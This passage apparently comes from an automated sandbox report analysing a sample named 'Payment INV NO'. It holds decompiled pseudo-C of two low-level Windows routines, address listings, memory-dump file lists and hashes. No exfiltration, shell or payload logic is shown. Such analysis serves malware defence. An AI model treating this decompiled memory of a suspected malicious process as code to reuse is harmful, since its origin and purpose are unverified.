								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x1887b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E017CA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E017AFFB0(_t193, _t235, 0x1888550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										E017B77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										E017B77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x1887b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x1887b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E017D37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x1887b9c; // 0x0
									_t214 = E017B4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E017D37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x1887b10 =  *0x1887b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x1887b04 =  *0x1887b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														_t126 = _t210 - 8; // 0xfd050f78
														E017B77F0(_t194, _t236, _t126);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													E017B77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x1887b08 =  *0x1887b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E017D57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E017DF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										E017B77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E017CA44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											E017B77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E017D96C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                                          0x017a849b
                                                          0x017a849b
                                                          0x017a849b
                                                          0x017a849b
                                                          0x017a849d
                                                          0x017a84a2
                                                          0x017a84a7
                                                          0x017a84b1
                                                          0x017a84d8
                                                          0x00000000
                                                          0x017a84b3
                                                          0x017a84c4
                                                          0x017a84c9
                                                          0x017a84cd
                                                          0x017a84cf
                                                          0x017a84cf
                                                          0x017a84d6
                                                          0x017a84e6
                                                          0x017a84e9
                                                          0x017a84ec
                                                          0x017a84ef
                                                          0x017a84f2
                                                          0x017a84f4
                                                          0x017a84fc
                                                          0x017a8501
                                                          0x017a8506
                                                          0x017a8509
                                                          0x017a86e0
                                                          0x017a86e5
                                                          0x017a86e8
                                                          0x017a86ed
                                                          0x017a86f0
                                                          0x017a86f2
                                                          0x017f9afd
                                                          0x017f9b02
                                                          0x017a84da
                                                          0x017a84df
                                                          0x017a84df
                                                          0x017a86fa
                                                          0x017a86fd
                                                          0x017a86fe
                                                          0x017a8701
                                                          0x017a8706
                                                          0x017a8709
                                                          0x017a870b
                                                          0x00000000
                                                          0x00000000
                                                          0x017a8711
                                                          0x017a8725
                                                          0x017a8727
                                                          0x017a872a
                                                          0x017a872c
                                                          0x017f9af0
                                                          0x017f9af5
                                                          0x017a8732
                                                          0x017a8732
                                                          0x017a8732
                                                          0x017a8735
                                                          0x017a8737
                                                          0x017a8515
                                                          0x017a8515
                                                          0x017a8518
                                                          0x017a851d
                                                          0x017a8523
                                                          0x017a8527
                                                          0x017a852b
                                                          0x017a8537
                                                          0x017a8539
                                                          0x017a853c
                                                          0x017a853e
                                                          0x017a868c
                                                          0x017a8691
                                                          0x017a8699
                                                          0x017a869b
                                                          0x017a8744
                                                          0x017a8748
                                                          0x017a86a1
                                                          0x017a86a1
                                                          0x017a86a1
                                                          0x017a86a4
                                                          0x017a86a8
                                                          0x017f9bdf
                                                          0x017f9bdf
                                                          0x017a86ae
                                                          0x017a86b0
                                                          0x00000000
                                                          0x017a86b6
                                                          0x00000000
                                                          0x017f9be9
                                                          0x017a86b0
                                                          0x017a8544
                                                          0x017a854a
                                                          0x017a854d
                                                          0x017a8551
                                                          0x017a876e
                                                          0x017a8778
                                                          0x017a877b
                                                          0x017a8780
                                                          0x017a8557
                                                          0x017a8557
                                                          0x017a855d
                                                          0x017a855d
                                                          0x017a856b
                                                          0x017a856e
                                                          0x017a8570
                                                          0x017a8573
                                                          0x017a8576
                                                          0x017a8576
                                                          0x017a8579
                                                          0x017a857b
                                                          0x00000000
                                                          0x00000000
                                                          0x017a8581
                                                          0x017a85a0
                                                          0x017a85a2
                                                          0x017a85a5
                                                          0x017a85a7
                                                          0x017f9b1b
                                                          0x017f9b1b
                                                          0x017a862e
                                                          0x017a862e
                                                          0x017a8631
                                                          0x017a8631
                                                          0x017a8634
                                                          0x017a8636
                                                          0x017a8669
                                                          0x017a8669
                                                          0x017a866b
                                                          0x017f9bbf
                                                          0x017f9bc4
                                                          0x017f9bc8
                                                          0x017f9bce
                                                          0x017f9bce
                                                          0x017a8671
                                                          0x017a8671
                                                          0x017a8674
                                                          0x017a8676
                                                          0x017f9bae
                                                          0x017f9bae
                                                          0x017a8676
                                                          0x017a867c
                                                          0x017a867e
                                                          0x017a8688
                                                          0x017a8688
                                                          0x00000000
                                                          0x017a867e
                                                          0x017a8638
                                                          0x017a8638
                                                          0x017a863b
                                                          0x017a863e
                                                          0x017a863f
                                                          0x017a8642
                                                          0x017a8645
                                                          0x017a8648
                                                          0x017a864d
                                                          0x017f9b69
                                                          0x017f9b6e
                                                          0x017f9b7b
                                                          0x017f9b81
                                                          0x017f9b85
                                                          0x017f9b89
                                                          0x017f9ba7
                                                          0x017f9b8b
                                                          0x017f9b91
                                                          0x017f9b94
                                                          0x017f9b9a
                                                          0x017f9b9f
                                                          0x017f9b9f
                                                          0x017a8788
                                                          0x017a878d
                                                          0x017a8763
                                                          0x017a8763
                                                          0x017a8766
                                                          0x00000000
                                                          0x017a8766
                                                          0x017f9b70
                                                          0x00000000
                                                          0x017f9b70
                                                          0x017a8656
                                                          0x017a865a
                                                          0x017a865c
                                                          0x017a8752
                                                          0x017a8756
                                                          0x00000000
                                                          0x00000000
                                                          0x017a875e
                                                          0x00000000
                                                          0x017a875e
                                                          0x017a8662
                                                          0x017a8662
                                                          0x017a8662
                                                          0x017a8666
                                                          0x00000000
                                                          0x017a8666
                                                          0x017a85b7
                                                          0x017a85b9
                                                          0x017a85bc
                                                          0x017a85bf
                                                          0x017a85cc
                                                          0x017a85d1
                                                          0x017a85d4
                                                          0x017a85db
                                                          0x017a85de
                                                          0x017a85e0
                                                          0x017f9b5f
                                                          0x00000000
                                                          0x017f9b5f
                                                          0x017a85e6
                                                          0x017a85ea
                                                          0x017a86c3
                                                          0x017a86c5
                                                          0x017a86c8
                                                          0x017a86ca
                                                          0x017f9b16
                                                          0x00000000
                                                          0x017f9b16
                                                          0x017a86d6
                                                          0x017a85f6
                                                          0x017a85f6
                                                          0x017a85f9
                                                          0x017a8602
                                                          0x017a8606
                                                          0x017a860a
                                                          0x017a860b
                                                          0x017a860e
                                                          0x017a8611
                                                          0x00000000
                                                          0x017a8611
                                                          0x017a85f3
                                                          0x00000000
                                                          0x017a85f3
                                                          0x017a8619
                                                          0x017a861e
                                                          0x017a861e
                                                          0x017a8621
                                                          0x017a8622
                                                          0x017a8623
                                                          0x017a8625
                                                          0x017a862c
                                                          0x00000000
                                                          0x017a873d
                                                          0x00000000
                                                          0x017a873d
                                                          0x017a8737
                                                          0x017a850f
                                                          0x017a8512
                                                          0x00000000
                                                          0x017a8512
                                                          0x00000000
                                                          0x017a84d6

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a2ac695c4d5fbabf81142c957dbe6e76cba4824911305339eac97523c6eb2f1a
                                                          • Instruction ID: 40f03591a1c94b2b602b5088819d560cf8dfbca1a9f1d6e1f12a5807d2e0ecdd
                                                          • Opcode Fuzzy Hash: a2ac695c4d5fbabf81142c957dbe6e76cba4824911305339eac97523c6eb2f1a
                                                          • Instruction Fuzzy Hash: 72B15B70E00209DFDB29DF99C984AAEFBB5BF88305F50422EE605AB346D770A945CF51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0179E009 Relevance: .3, Instructions: 282COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 95%
                                                          			E0179E009(void* __ecx) {
				signed int _v8;
				char _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				short _v208;
				signed int _v210;
				short _v212;
				short _v214;
				char _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				char _v240;
				signed char _v244;
				intOrPtr _v248;
				char _v252;
				char* _v256;
				short _v258;
				char _v260;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t122;
				signed int _t125;
				void* _t129;
				signed int _t157;
				void* _t165;
				short _t166;
				signed int _t181;
				void* _t182;
				signed int _t183;
				signed int _t187;
				intOrPtr _t194;
				signed int _t197;
				signed int _t202;
				signed int _t205;
				signed int _t214;
				signed int _t218;
				signed int _t219;
				signed int _t221;
				signed int _t227;
				signed int _t228;
				void* _t229;
				void* _t230;
				void* _t231;
				signed int _t232;

				_v8 =  *0x188d360 ^ _t232;
				_t231 = __ecx;
				_v220 = 0;
				_t228 = _t227 | 0xffffffff;
				_v232 = 0;
				_v244 = 0;
				_t181 = _t228;
				_v228 = _t181;
				_v236 = _t228;
				E017DFA60( &_v188, 0, 0xaa);
				_t122 = E017DA4C0();
				asm("sbb al, al");
				_v240 =  ~_t122 + 1;
				_t125 =  *(_t231 + 4) & 0x0000ffff;
				if(_t125 == 0) {
					_push( &_v220);
					if(E017DA980() < 0) {
						goto L31;
					}
					_t125 = _v220;
					goto L2;
				} else {
					_v220 = _t125;
					L2:
					_t193 = _t231;
					_t129 = E017A3BF4(_t231, _t125, 0,  &_v236);
					if(_t129 == 0xc0000034 || _t129 == 0xc00000bb) {
						_t214 = 0x55;
						_v224 = _t228;
						_t194 = E0179F358(_t193, _t214);
						_v244 = _t194;
						if(_t194 != 0) {
							_v248 = _t194;
							_v252 = 0xaa0000;
							if(E017A3B30(_v220 & 0x0000ffff,  &_v252) == 0) {
								goto L11;
							}
							_t165 = E0179E50F( &_v224, _t231, _v248, 1,  &_v224);
							_t205 = _t228;
							if(_t165 >= 0) {
								_t205 = _v224;
							}
							_t166 = 0x31;
							_v216 = _t166;
							_v210 = _t205;
							_v214 = 0;
							_v212 = _v220;
							_v208 = 0;
							_v204 = 0;
							_v200 = 0;
							_v196 = 0;
							_v192 = 0;
							E0179F395(_t231,  &_v216, _v248);
							if(E017D458B(_t231 + 0x14,  &_v216, 0) < 0) {
								goto L11;
							} else {
								_t172 =  *(_t231 + 0x14);
								_t181 = ( *( *(_t231 + 0x14) + 6) & 0x0000ffff) - 1;
								goto L6;
							}
						}
						_t127 = 0xc0000017;
						goto L31;
					} else {
						if(_t129 < 0) {
							L11:
							if(_v240 != 0) {
								_t228 = _t181;
							}
							_t214 = _t228;
							E0179E216(_t231, _t214);
							_t197 =  *(_t231 + 0x14);
							_t181 = 0;
							if(0 >=  *(_t197 + 6)) {
								L17:
								_v224 = _v224 & 0x00000000;
								if(0 >=  *(_t197 + 6)) {
									L25:
									_t228 = 0;
									if(0 >=  *(_t197 + 6)) {
										L29:
										_t137 = _v244;
										if(_v244 != 0) {
											E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t137);
										}
										_t127 = 0;
										L31:
										return E017DB640(_t127, _t181, _v8 ^ _t232, _t214, _t228, _t231);
									}
									_t182 = 0;
									do {
										if(( *(_t182 +  *((intOrPtr*)(_t197 + 0xc))) & 0x00000004) != 0) {
											L0184F37F(_t231, _t228);
											_t214 =  *(_t231 + 0x14);
										}
										_t228 = _t228 + 1;
										_t182 = _t182 + 0x1c;
										_t197 = _t214;
									} while (_t228 < ( *(_t214 + 6) & 0x0000ffff));
									goto L29;
								}
								_t218 = _t197;
								_t229 = 0;
								do {
									_t197 = _t218;
									_t183 =  *( *((intOrPtr*)(_t218 + 0xc)) + _t229) & 0x0000ffff;
									if((_t183 & 0x00000021) == 0x21) {
										if((_t183 & 0x00001000) == 0) {
											_v232 = _v232 + 1;
										}
										_t197 = _t218;
										if(_v240 != 0 && _v224 != _v228) {
											_t197 = _t218;
											if(_v232 >  *((intOrPtr*)(_t231 + 0x48))) {
												 *( *((intOrPtr*)(_t218 + 0xc)) + _t229) = _t183 & 0x0000ffdf;
												 *( *((intOrPtr*)( *(_t231 + 0x14) + 0xc)) + _t229) =  *( *((intOrPtr*)( *(_t231 + 0x14) + 0xc)) + _t229) | 0x00008000;
												_t197 =  *(_t231 + 0x14);
											}
										}
									}
									_t229 = _t229 + 0x1c;
									_t181 = _v224 + 1;
									_v224 = _t181;
									_t218 = _t197;
								} while (_t181 < ( *(_t197 + 6) & 0x0000ffff));
								goto L25;
							} else {
								_t219 = _t197;
								_t230 = 0;
								do {
									if(( *(_t230 +  *((intOrPtr*)(_t219 + 0xc))) & 0x00000022) == 0x22) {
										L0184F56C(_t231, _t181);
										_t157 =  *(_t231 + 0x14);
										_t202 =  *((intOrPtr*)(_t157 + 0xc));
										_v224 = _t202;
										_t221 =  *(_t202 + _t230) & 0x0000ffff;
										if((_t221 & 0x00001000) == 0) {
											_v232 = _v232 + 1;
										}
										_t197 = _t157;
										if(_v240 != 0 && _t181 != _v228 && _v232 >  *((intOrPtr*)(_t231 + 0x48))) {
											 *((short*)(_v224 + _t230)) = _t221 & 0x0000ffdf;
											 *( *((intOrPtr*)( *(_t231 + 0x14) + 0xc)) + _t230) =  *( *((intOrPtr*)( *(_t231 + 0x14) + 0xc)) + _t230) | 0x00008000;
											_t197 =  *(_t231 + 0x14);
										}
									}
									_t181 = _t181 + 1;
									_t230 = _t230 + 0x1c;
									_t219 = _t197;
								} while (_t181 < ( *(_t197 + 6) & 0x0000ffff));
								goto L17;
							}
						} else {
							_t181 = _v236;
							_t172 =  *(_t231 + 0x14);
							L6:
							_v228 = _t181;
							if(_t181 == _t228) {
								goto L11;
							}
							_t187 = _t181 * 0x1c;
							_v256 =  &_v188;
							_v258 = 0xaa;
							if(E0179E2F0(_t231,  *((intOrPtr*)(_t172 + 0xc)) + _t187,  &_v260) >= 0) {
								if(E017A3099(_t231, _v256) < 0) {
									 *( *((intOrPtr*)( *(_t231 + 0x14) + 0xc)) + _t187) =  *( *((intOrPtr*)( *(_t231 + 0x14) + 0xc)) + _t187) & 0x0000ffdf;
									 *( *((intOrPtr*)( *(_t231 + 0x14) + 0xc)) + _t187) =  *( *((intOrPtr*)( *(_t231 + 0x14) + 0xc)) + _t187) | 0x00008000;
								} else {
									_v232 = 1;
								}
							}
							_t181 = _v228;
							goto L11;
						}
					}
				}
			}





















































                                                          0x0179e01b
                                                          0x0179e023
                                                          0x0179e02a
                                                          0x0179e033
                                                          0x0179e036
                                                          0x0179e03c
                                                          0x0179e042
                                                          0x0179e04a
                                                          0x0179e051
                                                          0x0179e058
                                                          0x0179e060
                                                          0x0179e067
                                                          0x0179e06b
                                                          0x0179e071
                                                          0x0179e078
                                                          0x017f4ffd
                                                          0x017f5005
                                                          0x00000000
                                                          0x00000000
                                                          0x017f500b
                                                          0x00000000
                                                          0x0179e07e
                                                          0x0179e07e
                                                          0x0179e085
                                                          0x0179e091
                                                          0x0179e093
                                                          0x0179e09d
                                                          0x017f5019
                                                          0x017f501a
                                                          0x017f5026
                                                          0x017f5028
                                                          0x017f5030
                                                          0x017f5043
                                                          0x017f5051
                                                          0x017f5062
                                                          0x00000000
                                                          0x00000000
                                                          0x017f5079
                                                          0x017f507e
                                                          0x017f5083
                                                          0x017f5085
                                                          0x017f5085
                                                          0x017f508e
                                                          0x017f5095
                                                          0x017f50a4
                                                          0x017f50ab
                                                          0x017f50bb
                                                          0x017f50c4
                                                          0x017f50cb
                                                          0x017f50d1
                                                          0x017f50d7
                                                          0x017f50dd
                                                          0x017f50e3
                                                          0x017f50fa
                                                          0x00000000
                                                          0x017f5100
                                                          0x017f5100
                                                          0x017f5107
                                                          0x00000000
                                                          0x017f5107
                                                          0x017f50fa
                                                          0x017f5032
                                                          0x00000000
                                                          0x0179e0ae
                                                          0x0179e0b0
                                                          0x0179e11d
                                                          0x0179e124
                                                          0x0179e126
                                                          0x0179e126
                                                          0x0179e129
                                                          0x0179e12d
                                                          0x0179e132
                                                          0x0179e137
                                                          0x0179e13d
                                                          0x0179e163
                                                          0x0179e163
                                                          0x0179e170
                                                          0x0179e1cc
                                                          0x0179e1ce
                                                          0x0179e1d4
                                                          0x0179e1f5
                                                          0x0179e1f5
                                                          0x0179e1fd
                                                          0x017f51fc
                                                          0x017f51fc
                                                          0x0179e203
                                                          0x0179e205
                                                          0x0179e215
                                                          0x0179e215
                                                          0x0179e1d6
                                                          0x0179e1d8
                                                          0x0179e1e1
                                                          0x017f51e3
                                                          0x017f51e8
                                                          0x017f51e8
                                                          0x0179e1eb
                                                          0x0179e1ec
                                                          0x0179e1ef
                                                          0x0179e1f1
                                                          0x00000000
                                                          0x0179e1d8
                                                          0x0179e172
                                                          0x0179e174
                                                          0x0179e176
                                                          0x0179e179
                                                          0x0179e17b
                                                          0x0179e185
                                                          0x0179e18d
                                                          0x0179e18f
                                                          0x0179e18f
                                                          0x0179e19c
                                                          0x0179e19e
                                                          0x017f51af
                                                          0x017f51b4
                                                          0x017f51c9
                                                          0x017f51d3
                                                          0x017f51d7
                                                          0x017f51d7
                                                          0x017f51b4
                                                          0x0179e19e
                                                          0x0179e1b8
                                                          0x0179e1bf
                                                          0x0179e1c0
                                                          0x0179e1c6
                                                          0x0179e1c8
                                                          0x00000000
                                                          0x0179e13f
                                                          0x0179e13f
                                                          0x0179e141
                                                          0x0179e143
                                                          0x0179e14f
                                                          0x017f5134
                                                          0x017f5139
                                                          0x017f513c
                                                          0x017f513f
                                                          0x017f5145
                                                          0x017f514f
                                                          0x017f5151
                                                          0x017f5151
                                                          0x017f515e
                                                          0x017f5160
                                                          0x017f5193
                                                          0x017f519d
                                                          0x017f51a1
                                                          0x017f51a1
                                                          0x017f5160
                                                          0x0179e159
                                                          0x0179e15a
                                                          0x0179e15d
                                                          0x0179e15f
                                                          0x00000000
                                                          0x0179e143
                                                          0x0179e0b2
                                                          0x0179e0b2
                                                          0x0179e0b9
                                                          0x0179e0bc
                                                          0x0179e0bc
                                                          0x0179e0c4
                                                          0x00000000
                                                          0x00000000
                                                          0x0179e0cc
                                                          0x0179e0cf
                                                          0x0179e0da
                                                          0x0179e0f6
                                                          0x0179e107
                                                          0x017f5118
                                                          0x017f5127
                                                          0x0179e10d
                                                          0x0179e10d
                                                          0x0179e10d
                                                          0x0179e107
                                                          0x0179e117
                                                          0x00000000
                                                          0x0179e117
                                                          0x0179e0b0
                                                          0x0179e09d

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
